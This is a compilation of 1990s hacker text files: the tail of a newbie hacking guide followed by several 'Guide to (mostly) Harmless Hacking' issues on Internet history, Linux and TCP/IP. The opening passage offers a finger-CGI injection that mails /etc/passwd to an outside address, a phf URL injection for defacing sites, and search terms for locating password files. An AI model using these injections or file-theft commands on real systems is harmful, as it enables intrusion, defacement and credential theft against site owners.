Again for the finger-box hack to work you have to find a website with the /cgi-bin/ directory. I am just going to post the basic outline of commands for this cause my fingers are getting very tired of typing this :-). An example of finger-box hack is this:
http://www.XXXXX.com/cgi-bin/finger
After you type that in you will get a box, if you don't then the finger isn't there or you don't have access to it, and in the box type this:
nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd
Substitute where necessary, I have never actually gotten this trick to work cause I've never tried it more than once or twice cause I never needed it, but I knew about it so go crazy :-).
Rewriting A Web page Right From Your Web Browser
In order to do this trick again you need the /cgi-bin/ directory on your "target" site. For example, type this when you have a website that has the /cgi-bin/ directory:
http://www.XXXXX.com/cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some stuff"%2
"Some stuff" is whatever you want to add basically, but beware, sometimes the web site can track you using the cookies that you sent while on there page, so just to be sure that they don't have cookie requests, if you have Netscape, then in the configuration somewhere, I forget where, check the box that says "Enable alert when accepting a cookie" or something that looks along the lines of that.
4 - Neat stuff/Misc.
The first thing I am going to cover is just some very interesting tricks that I know about AltaVista, http://www.Altavista.com. These tricks only involve you typing in something for the search query. OK, here are a list of words and things that will bring up very interesting files from websites:
root:
root
passwd.txt
wwwadmin.cgi
wwwboard.cgi
wwwadmin.pl
wwwboard.pl
passwd (Note: supposed to bring up UNIX passwd files but I haven’t tried it, so if you try it send me some e-mail and let me know what happens).
wwwboard (Note: brings up the wwwboard directories so you can look for the passwd.txt file and other neat stuff).
master.passwd (Note: again, never tried it, so send me some feedback, let me know if it is even actually worth some1's time of typing it in, or just a hoax).
OK, those words work in about almost any search engine, but work best with AltaVista because AltaVista searches the links on the pages in it's archive for your word, and almost every page has a link to it's passwd file or something other that is of interest.
OK, now this next trick I thought of when I d/led HakTek to check it out it had a feature of deleting mail-bombed messages, now, if you don't have HakTek, and don't want it/can't find it, then just go into the mail directory of your web browser, and delete all the mail and the mail bomber has wasted his time.
Now I am just going to give you some UNIX commands and what they do, so if you want to be a UNIX fan or LINUX fan then check these out:
cd X - X = the directory that you want to switch to
ls - list all the files in a directory, excluding the hidden ones
ls -a - lists all the files in a directory, including the hidden ones
ls -A - lists all the hidden files in a directory, but not the . and ..
ls -ALF - lists the properties of all the files in a directory
cd .. - goes down one directory/subdirectory
cd . - absolutely nothing!
quit - log off the ftp site (obviously only on Win95 FTP)
Those commands listed above work on BOTH FTP sites AND UNIX machines, now here are commands that work ONLY on UNIX machines:
cat X - the file you want to view
vi - Visual Editor that you can use to edit files
edit - edit files (not sure on this one, works on some UNIX's)
ed - edit files (on all machines)
chmod - change the ownership of a file
help - list of commands that you can use (Note: * next to command means that it is not used on that certain UNIX machine)
man X - for further information on a CERTAIN UNIX command whereas X is the command that you want more information on
Well, that about does it for this file, but I really didn't want to wrap it up so I am going to add some links that will help you A LOT in your travels, so visit all these links for all the tools and other things that you'll need:
http://www.hackersclub.com - A great site, I give it two-thumbs up :-).
http://project-one.com - Under Construction, where this file was intended).
http://hackers.com - Under MAJOR Construction, going to be one of the best hacking sites ever, home of Revelation, I don't know him, but if he is reading this file, then Hi revelation! :-).
http://www.adirtroad.com - TONS of neat things, and TONS of free-stuff links, again, two-thumbs up :-).
http://easyweb.easynet.co.uk/~davegraham/britpack.htm - Brit Hack Pack, there was a rumor going around that there files had virii, that is a bunch of BS, I support them completely, even though I'm not British :-).
http://www.wtp.net/~xeno/main.htm - An all around good site
http://www.geocities.com/SiliconValley/3078/frame2.html - Well, I really only included this link cause the leader of this group and the guy who runs the page loves to cause mass destruction, and he's funny to watch, so keep being funny Senate :-).
http://www.WorkingDesigns.com - Absolutely nothing to do with hacking just a great place to go if you have any of there RPG games, hope they finish the site sometime soon... and my final link:
http://www.freestuff.com - You remember that site right?? I thought so; guess what you find there???
Well, I hope you enjoyed this file and learned a lot from it, I certainly put a lot of typing into it, so if you really want to send me some money.... I mean a donation, hehe, don't, keep your money, cause I'm sure you have better things to spend it on then giving it to me :-), *mentally smacking myself for refusing money*. OK, well, I will probably write a lot more files cause I enjoy writing Newbie stuff, so well, if you want to E-mail me the send mail to: RAWTAZ@CONNIX.COM
And I will get back to you whenever I can. Hang in there, you'll get there someday :-).
My "Quote" Of The Day (hehe):
Frustrated Person: "WHY WON'T THIS DAMN THING WORK?!?!?!?"
Calm, Clean Shaven Teacher: "Examine it, what do you find wrong with it?"
Frustrated Person: "NOTHING, IT IS BROKEN!!!"
Calm, Clean Shaven Teacher: "You are to quick to anger, learn patience."
Frustrated Person: "WHY PATIENCE, ITS BROKEN!!!!!!!"
Calm, Clean Shaven Teacher: "It's not plugged in."
Frustrated Person: "Oh, I knew that."
Moral of story: Patience is the ultimate weapon
-Phooey
Hacking for Dummies Volume 2
Hacking for Dummies
Contents of Volume 2:
Internet for Dummies
Linux!
Introduction to TCP/IP
Port Surfing!
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 1
Internet for Dummies -- skip this if you are a Unix wizard. But if you read on you’ll get some more kewl hacking instructions.
____________________________________________________________
The six Guides to (mostly) Harmless Hacking of Vol. 1 jumped immediately into how-to hacking tricks. But if you are like me, all those details of probing ports and playing with hypotheses and pinging down hosts gets a little dizzying.
So how about catching our breath, standing back and reviewing what the heck it is that we are playing with? Once we get the basics under control, we then can move on to serious hacking.
Also, I have been wrestling with my conscience over whether to start giving you step-by-step instructions on how to gain root access to other peoples’ computers. The little angel on my right shoulder whispers, “Gaining root without permission on other people’s computers is not nice. So don’t tell people how to do it.” The little devil on my left shoulder says, “Carolyn, all these hackers think you don’t know nothin’! PROOVE to them you know how to crack!” The little angel says, “If anyone reading Guide to (mostly) Harmless Hacking tries out this trick, you might get in trouble with the law for conspiracy to damage other peoples’ computers.” The little devil says, “But, Carolyn, tell people how to crack into root and they will think you are KEWL!”
So here’s the deal. In this and the next few issues of Guide to (mostly) Harmless Hacking I’ll tell you several ways to get logged on as the superuser in the root account of some Internet host computers. But the instructions will leave a thing or two to the imagination.
My theory is that if you are willing to wade through all this, you probably aren’t one of those cheap thrills hacker wannabes who would use this knowledge to do something destructive that would land you in jail.
*****************************
Technical tip: If you wish to become a *serious* hacker, you’ll need Linux (a freeware variety of Unix) on your PC. One reason is that then you can crack into root legally all you want -- on your own computer. It sure beats struggling around on someone else’s computer only to discover that what you thought was root was a cleverly set trap and the sysadmin and FBI laugh at you all the way to jail.
Linux can be installed on a PC with as little as a 386 CPU, only 2 Mb RAM and as little as 20 MB of hard disk. You will need to reformat your hard disk. While some people have successfully installed Linux without trashing their DOS/Windows stuff, don’t count on getting away with it. Backup, backup, backup!
*****************************
*****************************
You can go to jail warning: Crack into root on someone else’s computer and the slammer becomes a definite possibility. Think about this: when you see a news story about some hacker getting busted, how often do you recognize the name? How often is the latest bust being done to someone famous, like Dark Tangent or se7en or Emmanuel Goldstein? How about, like, never! That’s because really good hackers figure out how to not do stupid stuff. They learn how to crack into computers for the intellectual challenge and to figure out how to make computers safe from intruders. They don’t bull their way into root and make a mess of things, which tends to inspire sysadmins to call the cops.
*********************************
Exciting notice: Is it too boring to just hack into your own Linux machine? Hang in there. Ira Winkler of the National Computer Security Association, Dean Garlick of the Space Dynamics Lab of Utah State University and I are working on setting up hack.net, a place where it will be legal to break into computers. Not only that, we’re looking for sponsors who will give cash awards and scholarships to those who show the greatest hacking skills. Now does that sound like more phun than jail?
*****************************
So, let’s jump into our hacking basics tutorial with a look at the wondrous anarchy that is the Internet.
Note that these Guides to (mostly) Harmless Hacking focus on the Internet. That is because there are many legal ways to hack on the Internet. Also, there are over 10 million of these readily hackable computers on the Internet, and the number grows every day.
Internet Basics
No one owns the Internet. No one runs it. It was never planned to be what it is today. It just happened, the mutant outgrowth of a 1969 US Defense Advanced Research Projects Agency experiment.
This anarchic system remains tied together because its users voluntarily obey some basic rules. These rules can be summed up in two words: Unix and TCP/IP (with a nod to UUCP). If you understand, truly understand Unix and TCP/IP (and UUCP), you will become a fish swimming in the sea of cyberspace, an Uberhacker among hacker wannabes, a master of the Internet universe.
To get technical, the Internet is a world-wide distributed computer/communications network held together by a common communications standard, Transmission Control Protocol/Internet Protocol (TCP/IP) and a bit of UUCP. These standards allow anyone to hook up a computer to the Internet, which then becomes another node in this network of the Internet. All that is needed is to get an Internet address assigned to the new computer, which is then known as an Internet "host," and tie into an Internet communications link. These links are now available in almost all parts of the world.
If you use an on-line service from your personal computer, you, too, can temporarily become part of the Internet. There are two main ways to hook up to an on-line service.
There is the cybercouch potato connection that every newbie uses. It requires either a point-to-point (PPP) or SLIPconnection, which allows you to run pretty pictures with your Web browser. If you got some sort of packaged software from your ISP, it automatically gives you this sort of connection.
Or you can connect with a terminal emulator to an Internet host. This program may be something as simple as the Windows 3.1 “Terminal” program under the “Accessories” icon. Once you have dialed in and connected you are just another terminal on this host machine. It won’t give you pretty pictures. This connection will be similar to what you get on an old-fashioned BBS. But if you know how to use this kind of connection, it could even give you root access to that host.
But how is the host computer you use attached to the Internet? It will be running some variety of the Unix operating system. Since Unix is so easy to adapt to almost any computer, this means that almost any computer may become an Internet host.
For example, I sometimes enter the Internet through a host which is a Silicon Graphics Indigo computer at Utah State University. Its Internet address is fantasia.idec.sdl.usu.edu. This is a computer optimized for computer animation work, but it can also operate as an Internet host. On other occasions the entry point used may be pegasus.unm.edu, which is an IBM RS 6000 Model 370. This is a computer optimized for research at the University of New Mexico.
Any computer which can run the necessary software -- which is basically the Unix operating system -- has a modem, and is tied to an Internet communications link, may become an Internet node. Even a PC may become an Internet host by running one of the Linux flavors of Unix. After setting it up with Linux you can arrange with the ISP of your choice to link it permanently to the Internet.
In fact, many ISPs use nothing more than networked PCs running Linux!
As a result, all the computing, data storage, and sending, receiving and forwarding of messages on the Internet is handled by the millions of computers of many types and owned by countless companies, educational institutions, governmental entities and even individuals.
Each of these computers has an individual address which enables it to be reached through the Internet if hooked up to a appropriate communications link. This address may be represented in two ways: as a name or a number.
The communications links of the Internet are also owned and maintained in the same anarchic fashion as the hosts. Each owner of an Internet host is responsible for finding and paying for a communications link that will get that host tied in with at least one other host. Communications links may be as simple as a phone line, a wireless data link such as cellular digital packet data, or as complicated as a high speed fiber optic link. As long as the communications link can use TCP/IP or UUCP, it can fit into the Internet.
Thus the net grows with no overall coordination. A new owner of an Internet host need only get permission to tie into one communications link to one other host. Alternatively, if the provider of the communications link decides this host is, for example, a haven for spammers, it can cut this “rogue site” off of the Internet. The rogue site then must snooker some other communications link into tying it into the Internet again.
The way most of these interconnected computers and communications links work is through the common language of the TCP/IP protocol. Basically, TCP/IP breaks any Internet communication into discrete "packets." Each packet includes information on how to rout it, error correction, and the addresses of the sender and recipient. The idea is that if a packet is lost, the sender will know it and resend the packet. Each packet is then launched into the Internet. This network may automatically choose a route from node to node for each packet using whatever is available at the time, and reassembles the packets into the complete message at the computer to which it was addressed.
These packets may follow tortuous routes. For example, one packet may go from a node in Boston to Amsterdam and back to the US for final destination in Houston, while another packet from the same message might be routed through Tokyo and Athens, and so on. Usually, however, the communications links are not nearly so torturous. Communications links may include fiber optics, phone lines and satellites.
The strength of this packet-switched network is that most messages will automatically get through despite heavy message traffic congestion and many communications links being out of service. The disadvantage is that messages may simply disappear within the system. It also may be difficult to reach desired computers if too many communications links are unavailable at the time.
However, all these wonderful features are also profoundly hackable. The Internet is robust enough to survive -- so its inventors claim -- even nuclear war. Yet it is also so weak that with only a little bit of instruction, it is possible to learn how to seriously spoof the system (forged email) or even temporarily put out of commission other people's Internet host computers (flood pinging, for example.)
On the other hand, the headers on the packets that carry hacking commands will give away the account information from which a hacker is operating. For this reason it is hard to hide perfectly when on the Internet.
It is this tension between this power and robustness and weakness and potential for confusion that makes the Internet a hacker playground.
For example, HERE IS YOUR HACKER TIP YOU’VE BEEN WAITING FOR THIS ISSUE:
ftp://ftp.secnet.com
This ftp site was posted on the BUGTRAQ list, which is dedicated to discussion of Unix security holes. Moderator is Aleph One, who is a genuine Uberhacker. If you want to subscribe to the BUGTRAQ, email LISTSERV@netspace.org with message “subscribe BUGTRAQ.”
Now, back to Internet basics.
History of Internet
As mentioned above, the Internet was born as a US Advanced Research Projects Agency (ARPA) effort in 1969. Its inventors called it ARPANET. But because of its value in scientific research, the US National Science Foundation (NSF) took it over in 1983. But over the years since then it gradually evolved away from any single source of control. In April 1995 NSF cut the last apron strings. Now the Internet is run by no one. It just happens and grows out of the efforts of those who play with it and struggle with the software and hardware.
Nothing at all like this has ever happened before. We now have a computer system with a life of its own. We, as hackers, form a big part of the mutation engine that keeps the Internet evolving and growing stronger. We also form a big part of the immune system of this exotic creature.
The original idea of ARPANET was to design a computer and communications network that would eventually become so redundant, so robust, and so able to operate without centralized control, that it could even survive nuclear war. What also happened was that ARPANET evolved into a being that has survived the end of government funding without even a blip in its growth. Thus its anarchic offspring, the Internet, has succeeded beyond the wildest dreams of its original architects.
The Internet has grown explosively, with no end in sight. At its inception as ARPANET it held only 4 hosts. A quarter of a century later, in 1984, it contained only 1000 hosts. But over the next 5 years this number grew tenfold to 10,000 (1989). Over the following 4 years it grew another tenfold to 1 million (1993). Two years later, at the end of 1995, the Internet was estimated to have at least 6 million host computers. There are probably over 10 million now. There appears to be no end in sight yet to the incredible growth of this mutant child of ARPANET.
In fact, one concern raised by the exponential growth in the Internet is that demand may eventually far outrace capacity. Because now no entity owns or controls the Internet, if the capacity of the communications links among nodes is too small, and it were to become seriously bogged down, it might be difficult to fix the problem.
For example, in 1988, Robert Morris, Jr. unleashed a "virus"-type program on the Internet commonly known as the “Morris Worm.” This virus would make copies of itself on whatever computer it was on and then send copies over communications links to other Internet hosts. (It used a bug in sendmail that allowed access to root, allowing the virus to act as the superuser).
Quickly the exponential spread of this virus made the Internet collapse from the communications traffic and disk space it tied up.
At the time the Internet was still under some semblance of control by the National Science Foundation and was connected to only a few thousand computers. The Net was shut down and all viruses purged from its host computers, and then the Net was put back into operation. Morris, meanwhile, was put in jail.
There is some concern that, despite improved security measures (for example, "firewalls"), someone may find a new way to launch a virus that could again shut down the Internet. Given the loss of centralized control, restarting it could be much more time-consuming if this were to happen again.
But reestablishing a centralized control today like what existed at the time of the “Morris Worm” is likely to be impossible. Even if it were possible, the original ARPANET architects were probably correct in their assessment that the Net would become more susceptible for massive failure rather than less if some centralized control were in place.
Perhaps the single most significant feature of today's Internet is this lack of centralized control. No person or organization is now able to control the Internet. In fact, the difficulty of control became an issue as early as its first year of operation as ARPANET. In that year email was spontaneously invented by its users. To the surprise of ARPANET's managers, by the second year email accounted for the bulk of the communication over the system.
Because the Internet had grown to have a fully autonomous, decentralized life of its own, in April 1995, the NSF quit funding NSFNET, the fiber optics communications backbone which at one time had given NSF the technology to control the system. The proliferation of parallel communications links and hosts had by then completely bypassed any possibility of centralized control.
There are several major features of the Internet:
* World Wide Web -- a hypertext publishing network and now the fastest growing part of the Internet.
* email -- a way to send electronic messages
* Usenet -- forums in which people can post and view public messages
* telnet -- a way to login to remote Internet computers
* file transfer protocol -- a way to download files from remote Internet computers
* Internet relay chat -- real-time text conversations -- used primarily by hackers and other Internet old-timers
* gopher -- a way of cataloging and searching for information. This is rapidly growing obsolete.
As you port surfers know, there are dozens of other interesting but less well known services such as whois, finger, ping etc.
The World Wide Web
The World Wide Web is the newest major feature of the Internet, dating from the spring of 1992. It consists of "Web pages," which are like pages in a book, and links from specially marked words, phrases or symbols on each page to other Web pages. These pages and links together create what is known as "hypertext." This technique makes it possible to tie together many different documents which may be written by many people and stored on many different computers around the world into one hypertext document.
This technique is based upon the Universal Resource Locator (URL) standard, which specifies how to hook up with the computer and access the files within it where the data of a Web page may be stored.
A URL is always of the form http://, where includes a domain name which must be registered with an organization called InterNIC in order to make sure that two different Web pages (or email addresses, or computer addresses) don't end up being identical. This registration is one of the few centralized control features of the Internet.
Here's how the hypertext of the World Wide Web works. The reader would come to a statement such as "our company offers LTL truck service to all major US cities." If this statement on the "Web page" is highlighted, that means that a click of the reader's computer mouse will take him or her to a new Web page with details. These may include complete schedules and a form to fill out to order a pickup and delivery.
Some Web pages even offer ways to make electronic payments, usually through credit cards.
However, the security of money transfers over the Internet is still a major issue. Yet despite concerns with verifiability of financial transactions, electronic commerce over the Web is growing fast. In its second full year of existence, 1994, only some $17.6 million in sales were conducted over the Web. But in 1995, sales reached $400 million. Today, in 1996, the Web is jammed with commercial sites begging for your credit card information.
In addition, the Web is being used as a tool in the distribution of a new form of currency, known as electronic cash. It is conceivable that, if the hurdle of verifiability may be overcome, that electronic cash (often called ecash) may play a major role in the world economy, simplifying international trade. It may also eventually make national currencies and even taxation as we know it obsolete.
Examples of Web sites where one may obtain ecash include the Mark Twain Bank of St. Louis, MO (http://www.marktwain.com) and Digicash of Amsterdam, The Netherlands (http://www.digicash.com).
The almost out-of-control nature of the Internet manifests itself on the World Wide Web. The author of a Web page does not need to get permission or make any arrangement with the authors of other Web pages to which he or she wishes to establish links. Links may be established automatically simply by programming in the URLs of desired Web page links.
Conversely, the only way the author of a Web page can prevent other people from reading it or establishing hypertext links to it is to set up a password protection system (or by not having communications links to the rest of the Internet).
A problem with the World Wide Web is how to find things on it. Just as anyone may hook a new computer up to the Internet, so also there is no central authority with control or even knowledge of what is published where on the World Wide Web. No one needs to ask permission of a central authority to put up a Web page.
Once a user knows the address (URL) of a Web page, or at least the URL of a Web page that links eventually to the desired page, then it is possible (so long as communications links are available) to almost instantly hook up with this page.
Because of the value of knowing URLs, there now are many companies and academic institutions that offer searchable indexes (located on the Web) to the World Wide Web. Automated programs such as Web crawlers search the Web and catalog the URLs they encounter as they travel from hypertext link to hypertext link. But because the Web is constantly growing and changing, there is no way to create a comprehensive catalog of the entire Web.
Email
Email is the second oldest use of the Internet, dating back to the ARPAnet of 1972. (The first use was to allow people to remotely log in to their choice of one of the four computers on which ARPAnet was launched in 1971.)
There are two major uses of email: private communications, and broadcasted email. When broadcasted, email serves to make announcements (one-way broadcasting), and to carry on discussions among groups of people such as our Happy Hacker list. In the group discussion mode, every message sent by every member of the list is broadcasted to all other members.
The two most popular program types used to broadcast to email discussion groups are majordomo and listserv.
Usenet
Usenet was a natural outgrowth of the broadcasted email group discussion list. One problem with email lists is that there was no easy way for people new to these groups to join them. Another problem is that as the group grows, a member may be deluged with dozens or hundreds of email messages each day.
In 1979 these problems were addressed by the launch of Usenet. Usenet consists of news groups which carry on discussions in the form of "posts." Unlike an email discussion group, these posts are stored, typically for two weeks or so, awaiting potential readers. As new posts are submitted to a news group, they are broadcast to all Internet hosts that are subscribed to carry the news groups to which these posts belong.
With many Internet connection programs you can see the similarities between Usenet and email. Both have similar headers, which track their movement across the Net. Some programs such as Pine are sent up to send the same message simultaneously to both email addresses and newsgroups. All Usenet news readers allow you to email the authors of posts, and many also allow you to email these posts themselves to yourself or other people.
Now, here is a quick overview of the Internet basics we plan to cover in the next several issues of Guide to (mostly) Harmless Hacking:
1. Unix
We discuss “shells” which allow one to write programs (“scripts”) that automate complicated series of Unix commands. The reader is introduced to the concept of scripts which perform hacking functions. We introduce Perl, which is a shell programming language used for the most elite of hacking scripts such as SATAN.
3. TCP/IP and UUCP
This chapter covers the communications links that bind together the Internet from a hackers' perspective. Extra attention is given to UUCP since it is so hackable.
4. Internet Addresses, Domain Names and Routers
The reader learns how information is sent to the right places on the Internet, and how hackers can make it go to the wrong places! How to look up UUCP hosts (which are not under the domain name system) is included.
5. Fundamentals of Elite Hacking: Ports, Packets and File Permissions
This section lets the genie of serious hacking out of the bottle. It offers a series of exercises in which the reader can enjoy gaining access to almost any randomly chosen Internet host. In fact, by the end of the chapter the reader will have had the chance to practice several dozen techniques for gaining entry to other peoples' computers. Yet these hacks we teach are 100% legal!
_________________________________________________________
Want to subscribe to this list? Email hacker@techbroker.com with the message “subscribe happyhacker.” Want to share some kewl stuph with the Happy Hacker list? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 2
Linux!
________________________________________
Unix has become the primo operating system of the Internet. In fact, Unix is the most widely used operating system in the world among computers with more power than PCs.
True, Windows NT is coming up fast as a common Internet operating system, and is sooo wonderfully buggy that it looks like it could become the number one favorite to crack into. But today Unix in all its wonderful flavors still is the operating system to know in order to be a truly elite hacker.
So far we have assumed that you have been hacking using a shell account that you get through your Internet Service Provider (ISP). A shell account allows you to give Unix commands on one of your ISP's computers. But you don't need to depend on your ISP for a machine that lets you play with Unix. You can run Unix on your own computer and with a SLIP or PPP connection be directly connected to the Internet.
***********************
Newbie note: Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) connections give you a temporary Internet Protocol (IP) address that allows you to be hooked directly to the Internet. You have to use either SLIP or PPP connections to get to use a Web browser that gives you pictures instead on text only. So if you can see pictures on the Web, you already have one of these available to you.
The advantage of using one of these direct connections for your hacking activities is that you will not leave behind a shell log file for your ISP's sysadmin to pore over. Even if you are not breaking the law, a shell log file that shows you doing lots of hacker stuph can be enough for some sysadmins to summarily close your account.
********************
What is the best kind of computer to run Unix on? Unless you are a wealthy hacker who thinks nothing of buying a Sun SPARC workstation, you'll probably do best with some sort of PC. There are almost countless variants of Unix that run on PCs, and a few for Macs. Most of them are free for download, or inexpensively available on CD-ROMs.
The three most common variations of Unix that run on PCs are Sun's Solaris, FreeBSD and Linux. Solaris costs around $700. Enough said. FreeBSD is really, really good. But you con't find many manuals or newsgroups that cover FreeBSD.
Linux, however, has the advantage of being available in many variants (so you can have fun mixing and matching programs from different Linux offerings). Most importantly, Linux is supported by many manuals, news groups, mail lists and Web sites. If you have hacker friends in your area, most of them probably use Linux and can help you out.
*********************
Historical note: Linux was created in 1991 by a group led by Linus Torvalds of the University of Helsinki. Linux is copyrighted under the GNU General Public License. Under this agreement, Linux may be redistributed to anyone along with the source code. Anyone can sell any variant of Linux and modify it and repackage it. But even if someone modifies the source code he or she may not claim copyright for anything created from Linux. Anyone who sells a modified version of Linux must provide source code to the buyers and allow them to reuse it in their commercial products without charging licensing fees. This arrangement is known as a "copyleft."
Under this arrangement the original creators of Linux receive no licensing or shareware fees. Linus Torvalds and the many others who have contributed to Linux have done so from the joy of programming and a sense of community with all of us who will hopefully use Linux in the spirit of good guy hacking. Viva Linux! Viva Torvalds!
**********************
Linux consists of the operating system itself (called the "kernel") plus a set of associated programs.
The kernel, like all types of Unix, is a multitasking, multi-user operating system. Although it uses a different file structure, and hence is not directly compatible with DOS and Windows, it is so flexible that many DOS and Windows programs can be run while in Linux. So a power user will probably want to boot up in Linux and then be able to run DOS and Windows programs from Linux.
Associated programs that come with most Linux distributions may include:
* a shell program (Bourne Again Shell -- BASH -- is most common);
* compilers for programming languages such as Fortran-77 (my favorite!), C, C++, Pascal, LISP, Modula-2, Ada, Basic (the best language for a beginner), and Smalltalk.;
* X (sometimes called X-windows), a graphical user interface
* utility programs such as the email reader Pine (my favorite) and Elm
Top ten reasons to install Linux on your PC:
1.When Linux is outlawed, only outlaws will own Linux.
2. When installing Linux, it is so much fun to run fdisk without backing up first.
3.The flames you get from asking questions on Linux newsgroups are of a higher quality than the flames you get for posting to alt.sex.bestiality.
4.No matter what flavor of Linux you install, you'll find out tomorrow there was a far more 3l1te ersion you should have gotten instead.
5.People who use Free BSD or Solaris will not make fun of you. They will offer their sympathy instead.
6.At the next Def Con you'll be able to say stuph like "so then I su-ed to his account and grepped all his files for 'kissyface'." Oops, grepping other people's files is a no-no, forget I ever suggested it.
7.Port surf in privacy.
8.One word: exploits.
9.Installing Linux on your office PC is like being a postal worker and bringing an Uzi to work.
10.But - - if you install Linux on your office computer, you boss won't have a clue what that means.
What types of Linux work best? It depends on what you really want. Redhat Linux is famed for being the easiest to install. The Walnut Creek Linux 3.0 CD-ROM set is also really easy to install -- for Linux, that is! My approach has been to get lots of Linux versions and mix and match the best from each distribution.
I like the Walnut Creek version best because with my brand X hardware, its autodetection feature was a life-saver.
INSTALLING LINUX is not for the faint of heart! Several tips for surviving installation are:
1) Although you in theory can run Linux on a 286 with 4 MB RAM and two floppy drives, it is *much* easier with a 486 or above with 8 MB RAM, a CD-ROM, and at least 200 MB free hard disk space.
2) Know as much as possible about what type of mother board, modem, hard disk, CD-ROM, and video card you have. If you have any documentation for these, have them on hand to reference during installation.
3) It works better to use hardware that is name-brand and somewhat out-of-date on your computer. Because Linux is freeware, it doesn't offer device drivers for all the latest hardware. And if your hardware is like mine -- lots of Brand X and El Cheapo stuph, you can take a long time experimenting with what drivers will work.
4) Before beginning installation, back up your hard disk(s)! In theory you can install Linux without harming your DOS/Windows files. But we are all human, especially if following the advice of point 7).
5) Get more than one Linux distribution. The first time I successfully installed Linux, I finally hit on something that worked by using the boot disk from one distribution with the CD-ROM for another. In any case, each Linux distribution had different utility programs, operating system emulators, compilers and more. Add them all to your system and you will be set up to become beyond elite.
6) Buy a book or two or three on Linux. I didn't like any of them! But they are better than nothing. Most books on Linux come with one or two CD-ROMs that can be used to install Linux. But I found that what was in the books did not exactly coincide with what was on the CD-ROMs.
7) I recommend drinking while installing. It may not make debugging go any faster, but at least you won't care how hard it is.
Now I can almost guarantee that even following all these 6 pieces of advice, you will still have problems installing Linux. Oh, do I have 7 advisories up there? Forget number 7. But be of good cheer. Since everyone else also suffers mightily when installing and using Linux, the Internet has an incredible wealth of resources for the Linux -challenged.
If you are allergic to getting flamed, you can start out with Linux support Web sites.
The best I have found is http://sunsite.unc.edu:/pub/Linux/. It includes the Linux Frequently Asked Questions list (FAQ), available from
sunsite.unc.edu:/pub/Linux/docs/FAQ.
In the directory /pub/Linux/docs on sunsite.unc.edu you'll find a number of other documents about Linux, including the Linux INFO-SHEET and META-FAQ,
The Linux HOWTO archive is on the sunsite.unc.edu Web site at: /pub/Linux/docs/HOWTO. The directory /pub/Linux/docs/LDP contains the current set of LDP manuals.
You can get ``Linux Installation and Getting Started'' from sunsite.unc.edu in /pub/Linux/docs/LDP/install-guide. The README file there describes how you can order a printed copy of the book of the same name (about 180 pages).
Now if you don't mind getting flamed, you may want to post questions to the amazing number of Usenet news groups that cover Linux. These include:
comp.os.linux.advocacy Benefits of Linux compared
comp.os.linux.development.system Linux kernels, device drivers
comp.os.linux.x Linux X Window System servers
comp.os.linux.development.apps Writing Linux applications
comp.os.linux.hardware Hardware compatibility
comp.os.linux.setup Linux installation
comp.os.linux.networking Networking and communications
comp.os.linux.answers FAQs, How-To's, READMEs, etc.
linux.redhat.misc
alt.os.linux Use comp.os.linux.* instead
alt.uu.comp.os.linux.questions Usenet University helps you
comp.os.linux.announce Announcements important to Linux
comp.os.linux.misc Linux-specific topics
Want your Linux free? Tobin Fricke has pointed out that "free copies of Linux CD-ROMs are available the Linux Support & CD Givaway web site at http://emile.math.ucsb.edu:8000/giveaway.html. This is a project where people donate Linux CD's that they don't need any more. The project was seeded by Linux Systems Labs, who donated 800 Linux CDs initially! Please remember to donate your Linux CD's when you are done with them. If you live near a computer swap meet, Fry's, Microcenter, or other such place, look for Linux CD's there. They are usually under $20, which is an excellent investment. I personally like the Linux Developer's Resource by Infomagic, which is now up to a seven CD set, I believe, which includes all major Linux distributions (Slackware, Redhat, Debian, Linux for DEC Alpha to name a few)plus mirrors of tsx11.mit.edu and sunsite.unc.edu/pub/linux plus much more. You should also visit the WONDERFUL linux page at
http://sunsite.unc.edu/linux, which has tons of information, as well as the
http://www.linux.org/. You might also want to check out
http://www.redhat.com/ and http://www.caldera.com/ for more
information on commercial versions of linux (which are still freely available under GNU)."
How about Linux security? Yes, Linux, like every operating system, is imperfect. Eminently hackable, if you really want to know. So if you want to find out how to secure your Linux system, or if you should come across one of the many ISPs that use Linux and want to go exploring (oops, forget I
wrote that), here's where you can go for info:
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
http://bach.cis.temple.edu/linux/linux-security/
http://www.geek-girl.com/bugtraq/
There is also help for Linux users on Internet Relay Chat (IRC). Ben (cyberkid@usa.net)
hosts a channel called #LinuxHelp on the Undernet IRC server.
Last but not least, if you want to ask Linux questions on the Happy Hacker list, you're welcome. We may be the blind leading the blind, but what
the heck!
________________________________________
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.
________________________________________
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 3
Introduction to TCP/IP. That means packets! Datagrams! Ping oversize packet denial of service exploit explained. But this hack is a lot less mostly harmless than most. Don't try this at home...
____________________________________________________________
If you have been on the Happy Hacker list for awhile, you've been getting some items forwarded from the Bugtraq list on a new ping packet exploit.
Now if this has been sounding like gibberish to you, relax. It is really very simple. In fact, it is so simple that if you use Windows 95, by the time you finish this article you will know a simple, one-line command that you could use to crash many Internet hosts and routers.
*************************************************
YOU CAN GO TO JAIL WARNING: This time I'm not going to implore the wannabe evil genius types on this list to be virtuous and resist the temptation to misuse the information I'm about to give them. See if I care! If one of those guys gets caught crashing thousands of Internet hosts and routers, not only will they go to jail and get a big fine. We'll all think he or she is a dork. This exploit is a no-brainer, one-line command from Windows 95. Yeah, the operating system that is designed for clueless morons. So there is nothing elite about this hack. What is elite is being able to thwart this attack.
**************************************************
**************************************************
NEWBIE NOTE: If packets, datagrams, and TCP/IP aren't exactly your bosom buddies yet, believe me, you need to really get in bed with them in order to call yourself a hacker. So hang in here for some technical stuff. When
we are done, you'll have the satisfaction of knowing you could wreak havoc on the Internet, but are too elite to do so.
